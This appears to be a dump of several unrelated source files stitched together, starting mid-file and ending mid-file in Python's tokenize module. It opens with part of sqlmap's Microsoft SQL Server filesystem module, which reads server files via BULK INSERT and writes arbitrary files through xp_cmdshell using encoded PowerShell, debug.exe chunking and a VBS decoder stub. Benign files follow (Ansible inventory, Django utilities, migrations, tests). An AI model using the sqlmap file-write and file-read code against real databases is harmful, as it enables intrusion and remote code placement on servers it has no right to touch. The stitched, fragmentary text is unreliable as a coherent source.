inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = hexencode(wFileContent)
# TODO: need to be fixed
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
psString = psString.encode('utf-16le')
psString = psString.encode("base64")[:-1].replace("\n", "")
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("converting the file utilizing PowerShell EncodedCommand")
commands = ("cd %s" % tmpPath,
"powershell -EncodedCommand %s" % psString,
"del /F /Q %s" % randFilePath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = wFileContent.encode("base64")[:-1]
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "another technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
| gpl-2.0 | -8,906,479,215,008,853,000 | 39.23662 | 287 | 0.591291 | false |
nuagenetworks/vspk-python | vspk/v6/fetchers/nuipfilterprofiles_fetcher.py | 2 | 2156 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUIPFilterProfilesFetcher(NURESTFetcher):
""" Represents a NUIPFilterProfiles fetcher
Notes:
            This fetcher enables fetching NUIPFilterProfile objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUIPFilterProfile class that is managed.
Returns:
.NUIPFilterProfile: the managed class
"""
from .. import NUIPFilterProfile
return NUIPFilterProfile
| bsd-3-clause | 3,555,821,321,365,558,300 | 39.698113 | 86 | 0.730983 | false |
bols-blue/ansible | plugins/inventory/jail.py | 132 | 1288 | #!/usr/bin/env python
# (c) 2013, Michael Scherer <[email protected]>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from subprocess import Popen,PIPE
import sys
import json
result = {}
result['all'] = {}
pipe = Popen(['jls', '-q', 'name'], stdout=PIPE, universal_newlines=True)
result['all']['hosts'] = [x[:-1] for x in pipe.stdout.readlines()]
result['all']['vars'] = {}
result['all']['vars']['ansible_connection'] = 'jail'
if len(sys.argv) == 2 and sys.argv[1] == '--list':
print json.dumps(result)
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print json.dumps({'ansible_connection': 'jail'})
else:
print "Need an argument, either --list or --host <host>"
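# Added illustration: Ansible invokes this dynamic inventory script with
# --list or --host. Hypothetical output for a machine running two jails named
# "www1" and "db1" (names invented for the example):
#
#   $ ./jail.py --list
#   {"all": {"hosts": ["www1", "db1"], "vars": {"ansible_connection": "jail"}}}
#   $ ./jail.py --host www1
#   {"ansible_connection": "jail"}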
| gpl-3.0 | 1,940,142,698,944,674,800 | 33.810811 | 73 | 0.696429 | false |
maikodaraine/EnlightenmentUbuntu | bindings/python/python-efl/examples/elementary/test_segment_control.py | 1 | 2798 | #!/usr/bin/env python
# encoding: utf-8
import os
from efl.evas import EVAS_HINT_EXPAND, EVAS_HINT_FILL
from efl import elementary
from efl.elementary.window import StandardWindow
from efl.elementary.box import Box
from efl.elementary.icon import Icon
from efl.elementary.segment_control import SegmentControl
EXPAND_BOTH = EVAS_HINT_EXPAND, EVAS_HINT_EXPAND
EXPAND_HORIZ = EVAS_HINT_EXPAND, 0.0
FILL_BOTH = EVAS_HINT_FILL, EVAS_HINT_FILL
FILL_HORIZ = EVAS_HINT_FILL, 0.5
script_path = os.path.dirname(os.path.abspath(__file__))
img_path = os.path.join(script_path, "images")
def cb_seg_changed(seg, item):
print(seg)
print(item)
def segment_control_clicked(obj):
win = StandardWindow("segment-control", "Segment Control test",
autodel=True, size=(320, 280))
if obj is None:
win.callback_delete_request_add(lambda o: elementary.exit())
vbox = Box(win, size_hint_weight=EXPAND_BOTH, size_hint_align=FILL_BOTH)
win.resize_object_add(vbox)
vbox.show()
# segment 1
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "Only Text")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic)
ic = Icon(win)
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic, "Text + Icon")
seg.item_add(None, "Seg4")
seg.item_add(None, "Seg5")
seg.callback_changed_add(cb_seg_changed)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 2
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "SegmentItem")
it = seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 3
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=(0.5, 0.5))
for i in range(3):
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
if i == 1:
it = seg.item_add(ic)
else:
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 4
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ, disabled=True)
seg.item_add(None, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
win.show()
if __name__ == "__main__":
elementary.init()
segment_control_clicked(None)
elementary.run()
elementary.shutdown()
| unlicense | -3,053,627,461,250,338,000 | 25.647619 | 76 | 0.645461 | false |
AlexanderKaluzhny/instanotifier | instanotifier/notification/serializers.py | 1 | 1953 | from copy import deepcopy
import hashlib
from bs4 import BeautifulSoup
from rest_framework import serializers
from instanotifier.notification.models import RssNotification
from instanotifier.notification.utils import html
def _parse_country(summary):
soup = BeautifulSoup(summary, features="html5lib")
country_tag = soup.find(text="Country")
if country_tag:
country = country_tag.find_next(string=True).strip(': \n')
return country
return "Unknown"
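# Added doctest-style illustration (the markup below is invented, not from a
# real feed): the helper looks for the exact text node "Country" and returns
# the text that follows it, falling back to "Unknown".
#
#     >>> _parse_country('<b>Country</b>: Germany <br/>')
#     'Germany'
#     >>> _parse_country('<p>no country field here</p>')
#     'Unknown'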
def _compute_entry_id_hash(entry_id):
return hashlib.md5(entry_id.encode("utf-8")).hexdigest()
class RssNotificationCreateSerializer(serializers.ModelSerializer):
"""
Creates the RssNotification from the data provided by Feed parser.
Evaluates the necessary fields deriving it from the data.
"""
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
def to_internal_value(self, data):
new_data = deepcopy(data)
new_data['entry_id'] = data['id']
new_data['country'] = 'TBD' # it is a derived field, we will set it based on "summary" field
new_data['internal_id'] = 'TBD' # it is a derived field, we will set it based on "entry_id" field
new_data = super().to_internal_value(new_data)
return new_data
def validate_summary(self, value):
summary = html.clean_html(value)
return summary
def validate(self, validated_data):
summary = validated_data["summary"]
validated_data["country"] = _parse_country(summary)
validated_data["internal_id"] = _compute_entry_id_hash(validated_data["entry_id"])
return validated_data
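# Illustrative helper (added sketch, not part of the original app): shows the
# kind of feedparser-style entry dict the create serializer above expects.
# Every value below is invented for the example.
def _example_create_notification():
    entry = {
        "id": "https://example.com/rss/jobs/12345",
        "title": "Example job posting",
        "summary": "<b>Country</b>: Germany",
        "link": "https://example.com/rss/jobs/12345",
        "published_parsed": "2016-01-01T00:00:00Z",
    }
    serializer = RssNotificationCreateSerializer(data=entry)
    if serializer.is_valid():
        return serializer.save()
    return serializer.errors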
class RssNotificationUpdateSerializer(serializers.ModelSerializer):
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
| mit | 517,890,186,136,581,800 | 34.509091 | 106 | 0.678443 | false |
stgraber/snapcraft | integration_tests/test_make_plugin.py | 6 | 2306 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import (
DirExists,
Not
)
import integration_tests
class MakePluginTestCase(integration_tests.TestCase):
def test_stage_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_clean_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('snap', project_dir)
snap_dirs = ('stage', 'parts', 'prime')
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), DirExists())
self.run_snapcraft('clean', project_dir)
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), Not(DirExists()))
def test_nonstandard_makefile(self):
project_dir = 'simple-make-nonstandard-makefile'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_stage_make_with_artifacts(self):
project_dir = 'simple-make-artifacts'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'test'),
cwd=project_dir)
self.assertEqual('Hello World!\n', binary_output)
| gpl-3.0 | -4,563,130,811,681,119,000 | 32.911765 | 71 | 0.648742 | false |
gustavomazevedo/tbackup-client | client/migrations/0009_auto__add_field_backup_origin__chg_field_backup_remote_id.py | 1 | 4529 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Backup.origin'
db.add_column(u'client_backup', 'origin',
self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True),
keep_default=False)
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'Backup.origin'
db.delete_column(u'client_backup', 'origin')
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(default=0))
models = {
'client.backup': {
'Meta': {'object_name': 'Backup'},
'destination': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'remote_backup_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.Schedule']"})
},
'client.oplog': {
'Meta': {'object_name': 'OpLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'client.origin': {
'Meta': {'object_name': 'Origin'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {})
},
'client.rrule': {
'Meta': {'object_name': 'RRule'},
'description': ('django.db.models.fields.TextField', [], {}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'params': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'client.schedule': {
'Meta': {'object_name': 'Schedule'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'destination': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 27, 0, 0)'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.RRule']", 'null': 'True', 'blank': 'True'})
},
'client.webserver': {
'Meta': {'object_name': 'WebServer'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'api_root': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
}
}
complete_apps = ['client'] | mit | -9,024,610,039,972,506,000 | 55.625 | 134 | 0.547141 | false |
makacodewalker/etsgh | django/utils/datetime_safe.py | 496 | 2685 | # Python's datetime strftime doesn't handle dates before 1900.
# These classes override date and datetime to support the formatting of a date
# through its full "proleptic Gregorian" date range.
#
# Based on code submitted to comp.lang.python by Andrew Dalke
#
# >>> datetime_safe.date(1850, 8, 2).strftime("%Y/%m/%d was a %A")
# '1850/08/02 was a Friday'
from datetime import date as real_date, datetime as real_datetime
import re
import time
class date(real_date):
def strftime(self, fmt):
return strftime(self, fmt)
class datetime(real_datetime):
def strftime(self, fmt):
return strftime(self, fmt)
def combine(self, date, time):
        return datetime(date.year, date.month, date.day, time.hour, time.minute, time.second, time.microsecond, time.tzinfo)
def date(self):
return date(self.year, self.month, self.day)
def new_date(d):
"Generate a safe date from a datetime.date object."
return date(d.year, d.month, d.day)
def new_datetime(d):
"""
Generate a safe datetime from a datetime.date or datetime.datetime object.
"""
kw = [d.year, d.month, d.day]
if isinstance(d, real_datetime):
kw.extend([d.hour, d.minute, d.second, d.microsecond, d.tzinfo])
return datetime(*kw)
# This library does not support strftime's "%s" or "%y" format strings.
# Allowed if there's an even number of "%"s because they are escaped.
_illegal_formatting = re.compile(r"((^|[^%])(%%)*%[sy])")
def _findall(text, substr):
# Also finds overlaps
sites = []
i = 0
while 1:
j = text.find(substr, i)
if j == -1:
break
sites.append(j)
i=j+1
return sites
def strftime(dt, fmt):
if dt.year >= 1900:
return super(type(dt), dt).strftime(fmt)
illegal_formatting = _illegal_formatting.search(fmt)
if illegal_formatting:
raise TypeError("strftime of dates before 1900 does not handle" + illegal_formatting.group(0))
year = dt.year
# For every non-leap year century, advance by
# 6 years to get into the 28-year repeat cycle
delta = 2000 - year
off = 6 * (delta // 100 + delta // 400)
year = year + off
# Move to around the year 2000
year = year + ((2000 - year) // 28) * 28
timetuple = dt.timetuple()
s1 = time.strftime(fmt, (year,) + timetuple[1:])
sites1 = _findall(s1, str(year))
s2 = time.strftime(fmt, (year+28,) + timetuple[1:])
sites2 = _findall(s2, str(year+28))
sites = []
for site in sites1:
if site in sites2:
sites.append(site)
s = s1
syear = "%04d" % (dt.year,)
for site in sites:
s = s[:site] + syear + s[site+4:]
return s
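# Added worked illustration of the shift above: for dt.year == 1850,
# delta = 150, off = 6 * (150 // 100 + 150 // 400) = 6, so year becomes 1856,
# and the 28-year alignment then maps it to 1996 (1856 + 5 * 28). The string
# is formatted with 1996, and the year digits are swapped back to "1850" at
# the positions located via the year / year+28 comparison.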
| bsd-3-clause | -2,379,734,288,544,815,600 | 29.168539 | 111 | 0.627561 | false |
j00bar/django-widgy | widgy/contrib/form_builder/views.py | 1 | 1271 | from django.views.generic.edit import FormMixin
from django.shortcuts import get_object_or_404
from widgy.models import Node
class HandleFormMixin(FormMixin):
"""
An abstract view mixin for handling form_builder.Form submissions.
"""
def post(self, *args, **kwargs):
"""
copied from django.views.generic.edit.ProcessFormView, because we want
the post method, but not the get method.
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
put = post
def get_form_node(self):
node = get_object_or_404(Node, pk=self.kwargs['form_node_pk'])
node.prefetch_tree()
return node
def get_form_class(self):
self.form_node = self.get_form_node()
return self.form_node.content.build_form_class()
def get_context_data(self, **kwargs):
if 'form' in kwargs:
kwargs.setdefault(self.form_node.content.context_var, kwargs['form'])
return super(HandleFormMixin, self).get_context_data(**kwargs)
def form_valid(self, form):
return self.form_node.content.execute(self.request, form)
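# Illustrative subclass (added sketch, not part of the original package): a
# concrete view would typically mix HandleFormMixin into a template view; the
# template name below is hypothetical and the URL conf is assumed to provide
# the form_node_pk kwarg.
from django.views.generic import TemplateView
class ContactPageView(HandleFormMixin, TemplateView):
    template_name = 'pages/contact.html'  # hypothetical template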
| apache-2.0 | -5,065,467,504,449,733,000 | 31.589744 | 81 | 0.636507 | false |
fighterCui/L4ReFiascoOC | l4/pkg/python/contrib/Lib/tokenize.py | 62 | 16326 | """Tokenization help for Python programs.
generate_tokens(readline) is a generator that breaks a stream of
text into Python tokens. It accepts a readline-like method which is called
repeatedly to get the next line of input (or "" for EOF). It generates
5-tuples with these members:
the token type (see token.py)
the token (a string)
the starting (row, column) indices of the token (a 2-tuple of ints)
the ending (row, column) indices of the token (a 2-tuple of ints)
the original line (string)
It is designed to match the working of the Python tokenizer exactly, except
that it produces COMMENT tokens for comments and gives type OP for all
operators
Older entry points
tokenize_loop(readline, tokeneater)
tokenize(readline, tokeneater=printtoken)
are the same, except instead of generating tokens, tokeneater is a callback
function to which the 5 fields described above are passed as 5 arguments,
each time a new token is found."""
__author__ = 'Ka-Ping Yee <[email protected]>'
__credits__ = \
'GvR, ESR, Tim Peters, Thomas Wouters, Fred Drake, Skip Montanaro, Raymond Hettinger'
import string, re
from token import *
import token
__all__ = [x for x in dir(token) if x[0] != '_'] + ["COMMENT", "tokenize",
"generate_tokens", "NL", "untokenize"]
del x
del token
COMMENT = N_TOKENS
tok_name[COMMENT] = 'COMMENT'
NL = N_TOKENS + 1
tok_name[NL] = 'NL'
N_TOKENS += 2
def group(*choices): return '(' + '|'.join(choices) + ')'
def any(*choices): return group(*choices) + '*'
def maybe(*choices): return group(*choices) + '?'
Whitespace = r'[ \f\t]*'
Comment = r'#[^\r\n]*'
Ignore = Whitespace + any(r'\\\r?\n' + Whitespace) + maybe(Comment)
Name = r'[a-zA-Z_]\w*'
Hexnumber = r'0[xX][\da-fA-F]+[lL]?'
Octnumber = r'(0[oO][0-7]+)|(0[0-7]*)[lL]?'
Binnumber = r'0[bB][01]+[lL]?'
Decnumber = r'[1-9]\d*[lL]?'
Intnumber = group(Hexnumber, Binnumber, Octnumber, Decnumber)
Exponent = r'[eE][-+]?\d+'
Pointfloat = group(r'\d+\.\d*', r'\.\d+') + maybe(Exponent)
Expfloat = r'\d+' + Exponent
Floatnumber = group(Pointfloat, Expfloat)
Imagnumber = group(r'\d+[jJ]', Floatnumber + r'[jJ]')
Number = group(Imagnumber, Floatnumber, Intnumber)
# Tail end of ' string.
Single = r"[^'\\]*(?:\\.[^'\\]*)*'"
# Tail end of " string.
Double = r'[^"\\]*(?:\\.[^"\\]*)*"'
# Tail end of ''' string.
